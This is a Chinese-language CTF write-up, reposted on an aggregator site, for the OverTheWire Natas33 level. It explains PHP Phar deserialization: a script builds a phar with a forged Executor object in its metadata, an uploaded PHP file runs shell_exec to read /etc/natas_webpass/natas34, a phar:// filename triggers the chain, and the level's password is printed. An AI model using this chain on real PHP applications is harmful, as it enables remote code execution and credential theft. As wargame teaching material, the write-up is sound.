Natas33 Writeup(Phar反序列化漏洞)

Posted zhengna

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Natas33 Writeup(Phar反序列化漏洞)相关的知识,希望对你有一定的参考价值。

Natas33:

技术图片  

又是一个上传文件的页面,源码如下:

// graz XeR, the first to solve it! thanks for the feedback!
// ~morla
class Executor{
    private $filename=""; 		//三个私有参数
    private $signature=‘adeafbadbabec0dedabada55ba55d00d‘;
    private $init=False;

    function __construct(){		//类创建时调用
        $this->filename=$_POST["filename"];
        if(filesize($_FILES[‘uploadedfile‘][‘tmp_name‘]) > 4096) {	//限制文件大小
            echo "File is too big<br>";
        }
        else {														//将文件移动到/natas33/upload/目录下
            if(move_uploaded_file($_FILES[‘uploadedfile‘][‘tmp_name‘], "/natas33/upload/" . $this->filename)) {
                echo "The update has been uploaded to: /natas33/upload/$this->filename<br>";
                echo "Firmware upgrad initialised.<br>";
            }
            else{
                echo "There was an error uploading the file, please try again!<br>";
            }
        }
    }

    function __destruct(){		//类销毁时调用
        // upgrade firmware at the end of this script

        // "The working directory in the script shutdown phase can be different with some SAPIs (e.g. Apache)."
        if(getcwd() === "/") chdir("/natas33/uploads/");	//getchwd() 函数返回当前工作目录。chdir() 函数改变当前的目录。
        if(md5_file($this->filename) == $this->signature){	//md5_file() 函数计算文件的 MD5 散列。
            echo "Congratulations! Running firmware update: $this->filename <br>";
            passthru("php " . $this->filename); //执行外部命令
        }
        else{
            echo "Failur! MD5sum mismatch!<br>";
        }
    }
}

session_start();
if(array_key_exists("filename", $_POST) and array_key_exists("uploadedfile",$_FILES)) {
    new Executor();
}

查看源码,我们知道,当上传文件的MD5校验与adeafbadbabec0dedabada55ba55d00d匹配时,服务器会执行这个文件。很容易想到MD5碰撞,然而这里是无用的,因为对其进行了限制,限制为4096字节。

查看前端代码,会发现我们可以修改两个参数,文件名和文件内容。在下面这段代码中,我们可以看到文件名的设置,是用的session_id作为默认值。而且源码对上传文件的类型没有限制。

<form enctype="multipart/form-data" action="index.php" method="POST">
    <input type="hidden" name="MAX_FILE_SIZE" value="4096" />
    <input type="hidden" name="filename" value="<? echo session_id(); ?>" />
        Upload Firmware Update:<br/>
    <input name="uploadedfile" type="file" /><br />
    <input type="submit" value="Upload File" />
</form>

继续审计源码,发现在类销毁时调用了__destruct()魔术方法,猜测代码中可能存在PHP反序列化漏洞

我们利用反序列化漏洞,一般都是借助unserialize()函数,不过随着人们安全的意识的提高,这种漏洞利用越来越来难了,但是在2018年8月份的Blackhat2018大会上,来自Secarma的安全研究员Sam Thomas讲述了一种攻击PHP应用的新方式,利用这种方法可以在不使用unserialize()函数的情况下触发PHP反序列化漏洞。漏洞触发是利用Phar:// 伪协议读取phar文件时,会反序列化meta-data储存的信息(文章地址:https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It%27s-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It-wp.pdf)。

Phar文件结构

Phar文件主要包含三至四个部分:

1. A stub

  • stub的基本结构:<?php HALT_COMPILER();,stub必须以HALT_COMPILER();来作为结束部分,否则Phar拓展将不会识别该文件

2. a manifest describing the contents

  • Phar文件中被压缩的文件的一些信息,其中Meta-data部分的信息会以反序列化的形式储存,这里就是漏洞利用的关键点

3. the file contents

  • 被压缩的文件内容,在没有特殊要求的情况下,这个被压缩的文件内容可以随便写的,因为我们利用这个漏洞主要是为了触发它的反序列化

4. a signature for verifying Phar integrity

  • 签名校验

尝试利用phar反序列化漏洞获取密码

一 序列化

根据文件结构我们来自己构建一个phar文件(php内置了一个Phar类),代码如下:

<?php
	class Executor {
		private $filename = "xx.php"; 
        private $signature = True;
        private $init = false;
	}
	
	$phar = new Phar("test.phar");			//后缀名必须为phar
	$phar->startBuffering();
	$phar->addFromString("test.txt", ‘test‘);	//添加要压缩的文件
	$phar->setStub("<?php __HALT_COMPILER(); ?>");	//设置stub 
	$o = new Executor();
	$phar->setMetadata($o);				//将自定义的meta-data存入manifest
	$phar->stopBuffering();				//签名自动计算
?>

这段代码将filename修改成了xx.php,将signature修改为True。这样的的话,MD5比较将会始终为真,passthru()函数将会执行xx.php。

代码直接运行的时候会报错:

技术图片

将php.ini中的phar.readonly设置成off,重启服务后,重新运行代码,生成了一个test.phar文件。

技术图片

用Notepad++打开文件,可以发现,meta-data已经以序列化的形式存在test.phar文件中

技术图片

说明一下:其实就是把要执行的命令序列化保存在phar的压缩文件里

二 反序列化

对应序列化,肯定存在着反序列化的操作。php文件系统中很大一部分的函数在通过phar://解析时,存在着对meta-data反序列化的操作。

首先,上传一个用来读取密码的php文件,代码如下:

<?php echo shell_exec(‘cat /etc/natas_webpass/natas34‘); ?>

用bp将其拦截,修改名称为xx.php。然后点击Go,上传成功。

技术图片

然后,将生成的phar文件上传,并重命名,点击Go,上传成功。

技术图片

最后,将文件名修改为phar://test.phar/test.txt,强制md5_file()函数解析phar文档,获取到flag。

技术图片

flag:shu5ouSu6eicielahhae0mohd4ui5uig

 

参考:

https://blog.csdn.net/baidu_35297930/article/details/99974886
https://www.cnblogs.com/zy-king-karl/p/11454609.html
https://www.cnblogs.com/Byqiyou/p/10187672.html

以上是关于Natas33 Writeup(Phar反序列化漏洞)的主要内容,如果未能解决你的问题,请参考以下文章

Natas29 Writeup(Perl命令注入00截断绕过过滤)

Natas32 Writeup(Perl 远程代码执行)

Natas23 Writeup(php弱类型)

Natas25 Writeup(目录遍历头部注入)

Natas24 Writeup(strcmp绕过漏洞)

Natas31 Writeup(Perl 远程命令执行)